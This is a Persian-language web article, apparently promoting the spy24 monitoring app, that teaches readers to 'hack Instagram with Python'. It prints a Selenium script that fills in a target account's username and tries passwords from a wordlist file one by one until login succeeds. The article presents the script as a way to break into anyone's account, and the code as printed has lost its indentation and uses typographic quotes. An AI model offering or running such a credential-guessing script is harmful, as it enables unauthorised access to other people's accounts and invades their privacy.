هک اینستاگرام

نحوه هک اینستا با پایتون | آشنایی با کد های پایتون برای هک

هک اینستا با پایتون هم اکنون یکی از روش های محبوب و کارآمد برای برای هک این شبکه اجتماعی مجازی و محبوب به شمار می رود. اگر به دنبال یادگیری هک اینستا با برنامه نویسی پایتون می باشید، ما به شما پیشنهاد می کنیم که در ابتدا این مطلب را مطالعه نمایید و در گام بعدی  هک اینستاگرام با پایتون را چندین مرتبه امتحان کرده تا به این کار تسلط پیدا کنید. هک اینستا با پایتون با توجه به میزان دشواری که دارد، نیاز به کسب مهارت و تجربه کافی دارد. در ادامه این مطلب قصد داریم تا شما را با کد های پایتون برای هک و اموزش هک اینستا با پایتون آشنا کنیم. همچنین شما می توانید برای کنترل اینستاگرام دیگران، اقدام به دانلود برنامه کنترل اینستاگرام از طریق وبسایت spy24  کنید.

هک اینستاگرام با پایتون

استفاده از برنامه نویسی با پایتون یکی از روش هایی است که به شما در هک اینستاگرام کمک می کند. هک اینستا با پایتون در سایت ها و مقالات چندان زیادی آموزش داده نشده است. شاید شما نیز از جمله افرادی باشید که به دنبال شرح کاملی از این موضوع هستید، تا بتوانید اطلاعاتتان را نسبت به این موضوع افزایش دهید. بنابراین ما در ادامه درباره هک اینستا با پایتون اطلاعات کاملی را در اختیارتان قرار خواهیم داد تا از جزئیات این موضوع آگاهی لازم را به دست آورید و در صورت نیاز به هک این شبکه ی اجتماعی محبوب با استفاده از برنامه نویسی پایتون بپردازید.

پایتون چیست؟

هک اینستاگرام با پایتون

پایتون یک زبان برنامه نویسی شی گرا، سطح بالا و شناخته شده است که معنایی پویا دارد. ساختارهای داده ای این زبان برنامه نویسی سطح بسیار بالایی دارد و اتصال پویا آن توانسته برای توسعه برنامه های متعددی مورد توجه قرار گیرد. خوانایی کدهای پایتون نسبت به کد سایر زبان های برنامه نویسی بیشتر است و این موضوع باعث کاهش هزینه نگهداری برنامه های پایتون می شود. همچنین به دلیل ماژولار بودن، می توان کد ها را چندین مرتبه مورد استفاده قرار داد که از مهم ترین مزیت های زبان برنامه نویسی پایتون می باشد.

چگونگی هک اینستا با پایتون

اینکه بتوانیم پسوردهای کاربران را حدس بزنیم و به اکانت آن ها دسترسی داشته باشیم، کار دشواری به حساب می آید و هیچ کس نمی تواند ادعا کند که به راحتی می تواند چنین کاری را انجام دهد؛ زیرا این موضوع به میزان دشواری پسورد کاربران اینستاگرام بستگی دارد. اما برنامه نویسی این کار را برای ما ممکن کرده است و ما می توانیم به اسکریپت پایتون امیدوار باشیم؛ زیرا با کمک آن می توانیم وارد هر وب سایت و اکانتی شویم.

یک ویرایشگر کد (IDE) را باز کنید/ ویرایشگرهای بسیاری در تنوع بالا برای کد پایتون وجود دارد که از جمله آن می توان به ویرایشگر Idle، Pycharm، Visual Studio Code و … اشاره کرد. شما باید در ابتدا ویرایشگر موردنظر خود را باز کنید و سپس کد داده شده را در IDE اجرا کنید. با به اجرا درآوردن کد مربوطه، به صفحه اصلی اینستاگرام هدایت خواهید شد و با نام کاربری که وارد می کنید، یک فایل txt حاوی تعدادی پسورد به شما داده خواهد شد. پس از آن می توانید تمامی رمز عبور فایل های txt را بررسی کنید و در نهایت با موفقیت به حساب اینستاگرام وارد شوید.

برای هک اینستا با پایتون از چه کد دستوری باید استفاده کرد؟

کد هک اینستا با پایتون

شما باید در ادامه کد زیر را کپی نمایید و در کامپیوتر خود کد کپی شده را به اجرا در آورید.

from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
from time import sleep
#webdriver = webdriver.Firefox()
#webdriver.get(‘https://www.instagram.com/accounts/login/’)
PATH=”C:Program Fileschromedriver.exe”
webdriver=webdriver.Chrome(PATH)
webdriver.get(‘https://www.instagram.com/accounts/login/’)
sleep(3)
username = webdriver.find_element_by_name(‘username’)
username.send_keys(‘username’) # write the username of account you want to hack.
password = webdriver.find_element_by_name(‘password’)
passfile=open(‘mat.txt’,’r’)
def display(a):
print(“log in password “+a)
for i in passfile:
try:
password.send_keys(i)
submit = webdriver.find_element_by_tag_name(‘form’)
submit.submit()
c=webdriver.current_url
sleep(5)
b=webdriver.find_element_by_xpath(“//button[contains(text(), ‘Not Now’)]”)
b.click()
sleep(5)
c=webdriver.current_url
except NoSuchElementException:
password.send_keys(Keys.CONTROL,”a”,Keys.DELETE)
sleep(5)
url2=webdriver.current_url
if c!=url2:
display(i)
Break

سخن نهایی

ما در این مقاله به آموزش هک اینستا با پایتون پرداختیم و کدهای پایتون برای این کار را در اختیار شما قرار دادیم، تا بتوانید به راحتی با استفاده از پایتون، اکانت اینستاگرام افراد را هک کنید. همانطور که در این مقاله خواندید، پایتون نوعی زبان برنامه نویسی است که می توان با استفاده از آن، اینستاگرام را هک نمود.  کافیست کد هایی که در این مقاله به آن پرداختیم را با استفاده از یک ide به اجرا درآوردید تا بتوانید پیج مورد نظر خود را هک نمایید. همچنین می توانید برای کنترل اپلیکیشن اینستاگرام فرزندان خود، به دانلود برنامه کنترل اینستاگرام از طریق وبسایت spy24 بپردازید.

سوالات متداول

پایتون چیست؟

پایتون به عنوان زبان برنامه نویسی پویا و قابل تفسیر شناخته شده است.

هک اینستا با پایتون چگونه انجام می شود؟

هک اینستاگرام با پایتون نیاز به یادگیری و کسب مهارت و تجربه کافی دارد.

نحوه کار با پایتون تا چه اندازه دشوار است؟

با توجه به جدید بودن این روش، نحوه کار با این زبان برنامه نویسی کمی دشوار محسوب می شود.

هک اینستا با پایتون امکان پذیر است؟

با توجه به میزان دشواری کار با پایتون هک این شبکه مجازی با کمک این روش ممکن و در عین حال سخت شناخته شده است.

کلیس آندره

کلیس آندره، نامی که در دنیای امنیت شبکه به عنوان یک نویسنده و پژوهشگر برجسته شناخته می‌شود. او با انگیزه و تعهد عمیق به حفظ امنیت در دنیای دیجیتال، در حال تألیف مقالاتی برای وب‌سایت‌ها و منابع تخصصی می‌باشد. تخصص اصلی کلیس آندره در زمینه امنیت شبکه و فناوری‌های اطلاعاتی قرار دارد. او با داشتن دانش گسترده‌ای در مباحث مختلف امنیت شبکه از جمله رمزنگاری، نفوذ و تشخیص تهدیدات، توانسته است مقالاتی با محتوای غنی و عمیق تولید کند. با تجربه‌های متعدد و تحقیقات گسترده در زمینه امنیت شبکه، کلیس توانسته است راهکارها و راهنماهای مؤثری را برای مدیران سیستم، توسعه‌دهندگان نرم‌افزار و افراد علاقه‌مند به امنیت دیجیتال ارائه دهد. مقالات او به عنوان منابع معتبر در زمینه امنیت شبکه شناخته می‌شوند. با زبانی ساده و قابل فهم، کلیس توانسته است مفاهیم پیچیده امنیت شبکه را برای عموم مخاطبان تبیین کند. او با تمرکز بر راه‌حل‌های عملی و نکات کلیدی، مخاطبان را در جهت تقویت امنیت شبکه‌های خود هدایت می‌کند. با توجه به تلاش‌های فراوان کلیس آندره در ارتقاء امنیت دیجیتال، مقالات وی به عنوان راهنماهای مهم و ضروری در دنیای پیچیده و پرخطر امنیت شبکه به شمار می‌آیند. او با تأکید بر آگاهی و آموزش، به ارتقاء امنیت دیجیتال جامعه کمک می‌کند و نقش مهمی در این زمینه ایفا می‌نماید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا